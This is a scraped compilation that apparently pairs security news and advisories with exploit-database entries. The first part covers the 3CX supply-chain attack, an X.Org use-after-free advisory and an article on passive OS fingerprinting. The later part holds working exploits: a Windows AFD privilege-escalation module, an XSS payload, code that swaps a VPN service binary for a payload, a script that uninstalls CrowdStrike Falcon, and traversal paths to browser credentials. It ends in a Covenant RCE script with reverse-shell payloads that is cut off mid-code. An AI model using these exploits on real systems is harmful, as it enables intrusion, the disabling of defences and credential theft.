In a Solar Winds-like attack, compromised, digitally signed versions of 3CX DesktopApp are landing on user systems via the vendor's update mechanism.

Security researchers are sounding the alarm on what may well be another major SolarWinds or Kaseya-like supply chain attack, this time involving Windows and Mac versions of a widely used video conferencing, PBX, and business communication app from 3CX.

On March 30, multiple security vendors said they had observed legitimate, digitally signed versions of the 3CX DesktopApp bundled with malicious installers landing on user desktops via the company's official automatic update process, as well as via manual updates. The end result is a data-stealing malware being implanted as part of a likely cyber-espionage effort by an advanced persistent threat (APT) actor.

The potential impact of the new threat could be huge. 3CX claims some 600,000 installations worldwide with over 12 million daily users. Among its numerous big-name customers are companies like American Express, Avis, Coca Cola, Honda, McDonald's, Pepsi, and Toyota.

CrowdStrike assessed that the threat actor behind the campaign is Labyrinth Chollima, a group that many researchers believe is linked with the cyber-warfare unit of North Korea's intelligence agency, the Reconnaissance General Bureau (RGB). Labyrinth Chollima is one of four groups that CrowdStrike has assessed are part of North Korea's larger Lazarus Group.

The threat is still very much an active one. "Currently, the very latest installers and updates available on the public 3CX website are still the compromised and backdoored applications that are noted as known bad by numerous security firms," says John Hammond, senior security researcher at Huntress.

**Enterprise App Trojanized With Malicious Installers**

The weaponized app arrives on a host system when the 3CX Desktop Application automatically updates, or when a user grabs the latest version proactively. Once pushed to a system, the signed 3CX DesktopApp executes a malicious installer, which then beacons out to an attacker-controlled server, pulls down a second-stage, information-stealing malware from there, and installs it on the user's computer. CrowdStrike, one of the first to report on the threat on March 29, said in a few instances it had also observed malicious hands-on-keyboard activity on systems with the Trojanized 3CX app.

In a message early on March 30, 3CX CEO Nick Galea urged users to immediately uninstall the app, adding that Microsoft Windows Defender would do that automatically for users running the software. Galea urged customers that want the app's functionality to use the Web client version of the technology while the company works on delivering an update.

A security alert from 3CX CISO Pierre Jourdan identified the affected apps as Electron Windows App, shipped in Update 7, version numbers 18.12.407 & 18.12.416 and Electron Mac App version numbers 18.11.1213, 18.12.402, 18.12.407, & 18.12.416. "The issue appears to be one of the bundled libraries that we compiled into the Windows Electron App via GIT," Jourdan said.

**Attackers Likely Breached 3CX's Production Environment**

Neither Jourdan nor Galea's messages gave any indication of how the attacker managed to gain the access they needed to trojanize a signed 3CXDekstopApp.exe binary. But at least two security vendors that have analyzed the threat say it could have only happened if the attackers were in 3CX's development or build environment — in the same manner that SolarWinds was compromised.

"Although only 3CX has the complete picture of what happened, so far, from the forensics, we assess with high confidence that the threat actor had access to the production pipeline of 3CX," says Lotem Finkelstein, director of threat intelligence & research at Check Point Software. "The files are signed with 3CX certificates, the same as used for the previous benign versions. The code is built in a way that it keeps working as it normally should but also adds some malware."

Finkelstein says Check Point's investigation confirms that the Trojanized version of the 3CX DesktopApp is being delivered through either manual download or regular updates from the official system.

Dick O'Brien, principal intelligent analyst at Symantec Threat Hunter team, says the threat actor does not appear to have touched the main executable itself. Instead, the APT compromised two dynamic link libraries (DLLs) that were delivered along with the executable in the installer. 

"One DLL was replaced with a completely different file with the same name," O'Brien says. "The second was a Trojanized version of the legitimate DLL \[with\] the attackers essentially appending it with additional encrypted data." The attackers have used a technique, known as DLL sideloading, to trick the legitimate 3CX binary to load and execute the malicious DLL, he says.

O'Brien agrees that the attacker would have needed access to 3CX's production environment to pull off the hack. "How they did that remains unknown. But once they had access to the build environment, all they had to do was drop two DLLs into the build directory."

**Potentially Broad Impact**

Researchers at Huntress tracking the threat said they had so far sent out a total of 2,595 incident reports to customers warning them of hosts running susceptible versions of the 3CX desktop application. In these instances, the software matched the hash or identifier for one of the known bad applications. 

"The final stage of the attack chain as we know it is reaching out to the command-and-control servers, however, this appears to be on a set timer after seven days," says Huntress' Hammond. A Shodan search that Huntress conducted showed 242,519 publicly exposed 3CX systems, though the issue's impact is broader than just that set of targets.

"The updates received by the signed 3CX Desktop Application are coming from the legitimate 3CX update source, so at first blush, this looks normal," he adds. "Many end users did not expect the original and valid 3CX application to suddenly be setting off alarm bells from their antivirus or security products, and in the early timeline where there was not much information uncovered, and there was some confusion over whether the activity was malicious or not, he says.

**Shades of SolarWinds & Kaseya**

Hammond compares this incident to the breaches at SolarWinds and at Kaseya. 

With SolarWinds, attackers — likely linked with Russia's Foreign Intelligence Service — broke into the company's build environment and inserted a few lines of malicious code into updates for its Orion network management software. Some 18,000 customers received the updates, but the threat actor was really targeting only a small handful of them for subsequent compromise. 

The attack on Kaseya's VSA remote management technology resulted in more than 1,000 downstream customers of its managed service provider customers being impacted and subsequently targeted for ransomware delivery. The two attacks are examples of a growing trend of threat actors targeting trusted software providers and entities in the software supply chain to reach a broad set of victims. Concerns over the threat prompted President Biden to issue an executive order in May 2021 that contained specific requirements for bolstering supply chain security.

Automatic Updates Deliver Malicious 3CX 'Upgrades' to Enterprises

A flaw was found in X.Org Server Overlay Window. A Use-After-Free may lead to local privilege escalation. If a client explicitly destroys the compositor overlay window (aka COW), the Xserver would leave a dangling pointer to that window in the CompScreen structure, which will trigger a use-after-free later.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 29 Mar 2023 14:31:54 +0200
From: Olivier Fourdan <ofourdan@...hat.com>
To: oss-security@...ts.openwall.com
Subject: Fwd: X.Org Security Advisory: CVE-2023-1393: X.Org Server Overlay
 Window Use-After-Free


-------- Forwarded Message --------
Subject: X.Org Security Advisory: CVE-2023-1393: X.Org Server Overlay Window Use-After-Free
Date: Wed, 29 Mar 2023 14:15:05 +0200
From: Olivier Fourdan <ofourdan@...hat.com>
To: xorg-announce@...ts.x.org
CC: xorg@...ts.x.org, xorg-devel <xorg-devel@...ts.x.org>, zdi-disclosures@...ndmicro.com

X.Org Security Advisory: March 29, 2023

X.Org Server Overlay Window Use-After-Free
==========================================

This issue can lead to local privileges elevation on systems where the X
server is running privileged and remote code execution for ssh X forwarding
sessions.

ZDI-CAN-19866/CVE-2023-1393: X.Org Server Overlay Window Use-After-Free
Local Privilege Escalation Vulnerability

If a client explicitly destroys the compositor overlay window (aka COW),
the Xserver would leave a dangling pointer to that window in the CompScreen
structure, which will trigger a use-after-free later.

Patches
-------
Patch for this issue have been committed to the xorg server git repository.
xorg-server 21.1.8 will be released shortly and will include this patch.

- commit 26ef545b3 - composite: Fix use-after-free of the COW
    (https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3)

ZDI-CAN-19866/CVE-2023-1393

If a client explicitly destroys the compositor overlay window (aka COW),
we would leave a dangling pointer to that window in the CompScreen
structure, which will trigger a use-after-free later.

Make sure to clear the CompScreen pointer to the COW when the latter gets
destroyed explicitly by the client.

Thanks
======

The vulnerabilities have been discovered by Jan-Niklas Sohn working with
Trend Micro Zero Day Initiative.
**Download attachment "**OpenPGP\_0x14706DBE1E4B4540.asc**" of type "**application/pgp-keys**" (2990 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-1393: security - Fwd: X.Org Security Advisory: CVE-2023-1393: X.Org Server Overlay Window Use-After-Free

Network protocols can be used to identify operating systems and discern other device information.

Network security and asset management products have to be able to identify what operating systems are currently running in the organization. With this information, IT and security departments gain greater visibility and control over their networks.

Device and operating system information is trivial to collect if the device has a software agent installed. However, agents are not an option for some operating systems, especially those installed on embedded and Internet of Things devices. This is where passive OS fingerprinting comes in handy, since passive methods don't require installing software on devices and work for most operating systems. Passive OS fingerprinting involves matching uniquely identifying patterns in the host's network traffic and classifying the traffic accordingly. Several protocols from different network layers can be used for OS fingerprinting: MAC addresses, TCP/IP parameters, HTTP User-Agent strings, and DHCP requests.

The Open Systems Interconnection (OSI) model contains several protocols for the application, transport, network, and data link layers. As a rule of thumb, protocols at the lower levels of the OSI stack — such as MAC and IP — provide better reliability with lower granularity compared with those on the upper levels of stack, and vice versa. Let's start at the bottom of the stack and move up.

**Start at the MAC Address**

The medium access control (MAC) protocol uses a unique physical identifier hardcoded into the device during manufacturing. The 12-digit hexadecimal number — the MAC address — is commonly written out as six pairs divided by hyphens. The left most six-digit long string represents the manufacturer's unique identifier and the right most six represent the serial number of the device's network interface card. For example, the six left-most digits of a MacBook laptop's MAC address would be 88:66:5a, which is the string affiliated with Apple.

By looking at the manufacturer's unique identifier, network administrators can infer the type of device running in the network and, in some cases, even the operating system.

**TCP/IP Tells Tales**

The TCP/IP stack is a more granular source of information. Most operating systems set unique values in the parameters within the packet headers, making it possible to identify the OS by looking at these values. Some of the most common parameters used in OS fingerprinting are initial time to live (TTL), Windows Size, "Don't Fragment" flag, and TCP options (values and order). For example, if a device has an outgoing packet's IP header with the "Don't fragment" flag set, TTL with the value of 64, Windows size of 65535, and a specific set of TCP options (02, 01, 03, 01, 01, 08, 04, 00), that's enough to identify it as running MacOS.

**HTTP Has a Wealth of Info**

Several protocols in the application layer are also useful for identifying the device's operating system type and the exact version or distribution. In some cases, these fields can be configured by the user and, thus, are less reliable.

The most common application protocol used in OS fingerprinting is HTTP, via the header's User-Agent field. The field, added by the application (such as a Web browser), includes information such as the application, operating system, and underlying device of the client. For example, the HTTP request to the server could contain a User-Agent field that identifies the client as a Firefox browser running on a Windows 7 OS: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0.

The User-Agent field is not the only indicator the HTTP protocol contains. Most operating systems have a built-in connectivity test that automatically runs when the device connects to a public network. For example, Network Connectivity Status Indicator (NCSI), an Internet connection awareness protocol in Microsoft's Windows operating systems, consists of a sequence of specifically crafted DNS and HTTP requests and responses that indicate if the host is located behind a captive portal or a proxy server.

**DHCP Identifies Hosts**

The DHCP protocol, used for IP assignment over the network, provides several indicators that can be used to identify the host. DHCP is composed of 4 steps: discovery, offer, request, and acknowledge (DORA). For example, a Windows host broadcasting DHCP messages over the local network and receiving replies from the DHCP server will be sending a unique vendor class identifier "MSFT 5.0," and the parameter request list would contain a sequence of values common to Windows hosts.

Combined with the order of the DHCP options themselves, the indicators are sufficient to identify the host as a Windows OS.

**Wrapping Up**

While some protocols provide better accuracy than others, there is no "silver bullet" for the task of OS identification, and the different options provide different types of information. Rather than fingerprinting based on a single protocol, you might consider a multiprotocol approach, such as combining the HTTP User-Agent with lower-level TCP options.

How to Solve IoT's Identity Problem

A vulnerability exists in the Windows Ancillary Function Driver for Winsock (afd.sys) can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. Due to a flaw in AfdNotifyRemoveIoCompletion, it is possible to create an arbitrary kernel Write-Where primitive, which can be used to manipulate internal I/O ring structures and achieve local privilege escalation. This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in January 2023 updates).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  include Msf::Post::Windows::FileInfo  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Ancillary Function Driver (AFD) for WinSock Elevation of Privilege',          'Description' => %q{            A vulnerability exists in the Windows Ancillary Function Driver for Winsock            (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of            NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is            possible to create an arbitrary kernel Write-Where primitive, which can be used            to manipulate internal I/O ring structures and achieve local privilege            escalation.            This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in            January 2023 updates).          },          'License' => MSF_LICENSE,          'Author' => [            'chompie', # Github PoC            'b33f', # Github PoC            'Yarden Shafir', # I/O Ring R/W primitive PoC            'Christophe De La Fuente' # Metasploit module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'Privileged' => true,          'Targets' => [            [ 'Windows 11 22H2 x64', { 'Arch' => ARCH_X64 } ]          ],          'Payload' => {            'DisableNops' => true          },          'References' => [            [ 'CVE', '2023-21768' ],            [ 'URL', 'https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768' ],            [ 'URL', 'https://github.com/yardenshafir/IoRingReadWritePrimitive' ]          ],          'DisclosureDate' => '2023-01-10',          'DefaultTarget' => 0,          'Notes' => {            'Stability' => [],            'Reliability' => [ REPEATABLE_SESSION ],            'SideEffects' => []          }        }      )    )  end  def check    unless session.platform == 'windows'      return Exploit::CheckCode::Safe('Only Windows systems are affected')    end    major, minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntoskrnl.exe')    vprint_status("Windows Build Number = #{build}.#{revision}")    unless major == 6 && minor == 2 && build == 22621      return CheckCode::Safe('The exploit only supports Windows 11 22H2')    end    if revision > 963      return CheckCode::Safe("This Windows host seems to be patched (build 22621.#{revision})")    end    CheckCode::Appears  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21768', 'CVE-2023-21768.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend

Ancillary Function Driver (AFD) For Winsock Privilege Escalation

WordPress WPForms plugin version 1.7.8 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)# Date: 2022-12-05# Author: Milad karimi# Software Link: https://wordpress.org/plugins/wpforms-lite# Version: 1.7.8# Tested on: Windows 10# CVE: N/A1. Description:This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.2. Proof of Concept:https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

WordPress WPForms 1.7.8 Cross Site Scripting

Forcepoint (Stonesoft VPN Client) versions 6.2.0 and 6.8.0 suffer from a privilege escalation vulnerability.

    # Exploit Author : TOUHAMI KASBAOUI# Vendor Homepage : https://www.forcepoint.com/ # Software: Stonesoft VPN Windows# Version : 6.2.0 / 6.8.0# Tested on : Windows 10# CVE : N/A#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM#define UNICODE#define _UNICODE#include <Windows.h>#include <iostream>using namespace std;enum Result{    unknown,    serviceManager_AccessDenied,    serviceManager_DatabaseDoesNotExist,    service_AccessDenied,    service_InvalidServiceManagerHandle,    service_InvalidServiceName,    service_DoesNotExist,    service_Exist};Result ServiceExists(const std::wstring& serviceName){    Result r = unknown;    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);    if (manager == NULL)    {        DWORD lastError = GetLastError();        if (lastError == ERROR_ACCESS_DENIED)            return serviceManager_AccessDenied;        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)            return serviceManager_DatabaseDoesNotExist;        else            return unknown;    }    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);    if (service == NULL)    {        DWORD error = GetLastError();        if (error == ERROR_ACCESS_DENIED)            r = service_AccessDenied;        else if (error == ERROR_INVALID_HANDLE)            r = service_InvalidServiceManagerHandle;        else if (error == ERROR_INVALID_NAME)            r = service_InvalidServiceName;        else if (error == ERROR_SERVICE_DOES_NOT_EXIST)            r = service_DoesNotExist;        else            r = unknown;    }    else        r = service_Exist;    if (service != NULL)        CloseServiceHandle(service);    if (manager != NULL)        CloseServiceHandle(manager);    return r;}bool ChangeName() {    LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";    LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";    bool success = MoveFile(parrentvpnfilename, newName);    if (success) {        cerr << "[+] SVGVPN filename changed.\n";    }    else {        cerr << "Failed to rename file \n";    }    return 0;}int main() {    const uint8_t shellcode[7168] = {        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    }; //You can set array bin of your reverse shell PE file here    std::wstring serviceName = L"sgipsecvpn";    Result result = ServiceExists(serviceName);    if (result == service_Exist)        std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;    else if (result == service_DoesNotExist)        std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;    else        std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;    ChangeName();    HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";    if (fileHandle == INVALID_HANDLE_VALUE) {        cerr << "Failed to create shellcode\n";        return 1;    }    DWORD bytesWritten;    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {        cerr << "Failed to write to file\n";        CloseHandle(fileHandle);        return 1;    }    CloseHandle(fileHandle);    cout << "[+] Payload exported to ForcePointVPN \n";    Sleep(30);    cout << "[+] Restart ForcePointVPN Service \n";    SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);    SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);    SERVICE_STATUS serviceStatus;    QueryServiceStatus(serviceHandle, &serviceStatus);    if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {        ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);        while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {            QueryServiceStatus(serviceHandle, &serviceStatus);            Sleep(1000);        }    }    StartService(serviceHandle, NULL, NULL);    CloseServiceHandle(serviceHandle);    CloseServiceHandle(scmHandle);    return 0;}

Forcepoint (Stonesoft VPN Client) 6.2.0 / 6.8.0 Local Privilege Escalation

CrowdStrike Falcon Agent version 6.44.15806 has an uninstall bypass flaw that works without an installation token.

    # Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token # Date: 30/11/2022 # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) # Vendor Homepage: https://www.crowdstrike.com/ # Author Homepage: https://www.deda.cloud/ # Tested On: All Windows versions # Version: 6.44.15806 # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"foreach($obj in $InstalledSoftware){    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))    {        $uninstall_uuid = $obj.Name.Split("\")[6]    }}$g_msiexec_instances = New-Object System.Collections.ArrayListWrite-Host "[+] Identified installed Falcon: $uninstall_uuid"Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"while($true){  if (get-process -Name "CSFalconService") {    Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {            if (-Not $g_msiexec_instances.contains($_.id)){        $g_msiexec_instances.Add($_.id)        if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){          Start-Sleep -Milliseconds 100          Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]          stop-process -Force -Id $g_msiexec_instances[-1]                }      }        }  } else {     Write-Host "[+] CSFalconService process vanished...reboot and have fun!"    break  }}

CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue

Lavasoft version 4.1.0.409 suffers from an unquoted service path vulnerability.

    #Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path# Author: P4p4 M4n3# Discovery Date: 25-11-2022# Vendor Homepage: https://webcompanion.com/en/# Version 4.1.0.409# Tested on:  Microsoft Windows Server 2019 Datacenter x64# Description:# Lavasoft 4.1.0.409 install DCIservice  as a service with an unquoted service path# POC https://youtu.be/yb8AavCMbes #Discover the Unquoted Service pathC:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """DCIService        C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe    Auto  C:\Users\p4p4> sc qc DCIService[SC] QueryServiceConfig réussite(s)SERVICE_NAME: DCIService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : DCIService        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

Lavasoft 4.1.0.409 Unquoted Service Path

Virtual Reception version 1.0 suffers from a directory traversal vulnerability.

    # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal# Exploit Author: Spinae# Vendor Homepage: https://www.virtualreception.nl/# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY# Tested on: allWe discovered the web server of the Virtual Reception appliance is prone toan unauthenticated directory traversal vulnerability. This allows anattacker to traverse outside the server root directory by specifying filesat the end of a URL request.This is a NUC5i5RYhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hostshttp://[ip address]/C:/windows/WindowsUpdate.log...A user called 'receptie' exists on the Windows system:http://[ip address]/c:/users/receptie/ntuser.dathttp://[ip address]/c:/users/receptie/ntuser.inihttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log...http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Login Datahttp://[ipaddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20Statehttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Cookies...The appliance also keeps a log of the visitors that register at theentrance:http://[ip address]/visitors.csvhash icon for shodan searches:https://www.shodan.io/search?query=http.favicon.hash%3A656388049No reply from the vendor (phone, email, website form submissions), firstreported in 2021.-- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.

Virtual Reception 1.0 Directory Traversal

Covenant version 0.5 suffers from a remote code execution vulnerability.

    # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:##   - https://blog.null.farm/hunting-the-hunters##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt  # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request  # pip3 install requestsfrom subprocess import runfrom pwn import remote, context  # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements():    if which("mcs") is None:        print("Please install the mono framework in order to compile the payload.")        print("https://www.mono-project.com/download/stable/")        exit(-1)def random_hex(length):    alphabet = "0123456789abcdef"    return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""):    warnings.simplefilter('ignore', InsecureRequestWarning)    return request(        method,        f"{args.target}/api/{route}",        json=body,        headers={            "Authorization": f"Bearer {token}",            "Content-Type": "application/json"        },        verify=False    )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'    payload_data = {        "sub": username,        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [            "User",            "Administrator"        ],        "exp": int(time()) + 360,        "iss": "Covenant",        "aud": "Covenant"    }    token = jwt.encode(payload_data, secret_key, algorithm='HS256')    return tokendef get_id_admin(token, json_roles):    id_admin = ""    for role in json_roles:        if role["name"] == "Administrator":            id_admin = role["id"]            print(f"\t[*] Found the admin group id : {id_admin}")            break    else:        print("\t[!] Did not found admin group id, quitting !")        exit(-1)    id_admin_user = ""    json_users_roles = request_api("get", token, f"users/roles").json()    for user_role in json_users_roles:        if user_role["roleId"] == id_admin:            id_admin_user = user_role["userId"]            print(f"\t[*] Found the admin user id : {id_admin_user}")            break    else:            print("\t[!] Did not found admin id, quitting !")        exit(-1)    json_users = request_api("get", token, f"users").json()    for user in json_users:        if user["id"] == id_admin_user:            username_admin = user["userName"]            print(f"\t[*] Found the admin username : {username_admin}")            return username_admin, id_admin_user    else:            print("\t[!] Did not found admin username, quitting !")        exit(-1)def compile_payload():    if args.os == "windows":        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'    else:        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'    dll = """using System;using System.Reflection;namespace ExampleDLL{    public class Class1{        public Class1(){        }        public void Main(string[] args){            System.Diagnostics.Process.Start(""" + payload + """);        }    }}"""    temp_dll_path = f"/tmp/{random_hex(8)}"    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())    print(f"\t[*] Writing payload in {temp_dll_path}.cs")    compilo_path = which("mcs")    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])    if compilation.returncode:        print("\t[!] Error when compiling DLL, quitting !")        exit(-1)    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()    remove(temp_dll_path + ".cs")    remove(temp_dll_path + ".dll")    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")    return dll_encodeddef generate_wrapper(dll_encoded):    wrapper = """public static class MessageTransform {    public static string Transform(byte[] bytes) {        try {            string assemblyBase64 = \"""" + dll_encoded + """\";            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);            var assembly = System.Reflection.Assembly.Load(assemblyBytes);            foreach (var type in assembly.GetTypes()) {                object instance = System.Activator.CreateInstance(type);                object[] args = new object[] { new string[] { \"\" } };                try {                    type.GetMethod(\"Main\").Invoke(instance, args);                }                catch {}            }        }        catch {}        return System.Convert.ToBase64String(bytes);    }    public static byte[] Invert(string str) {        return System.Convert.FromBase64String(str);    }}"""    return wrapperdef upload_profile(token, wrapper):    body = {        'httpUrls': [            '/en-us/index.html',            '/en-us/docs.html',            '/en-us/test.html'        ],        'httpRequestHeaders': [            {'name': 'User-Agent',             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '                      'Safari/537.36'},            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}        ],        'httpResponseHeaders': [            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}        ],        'httpPostRequest': 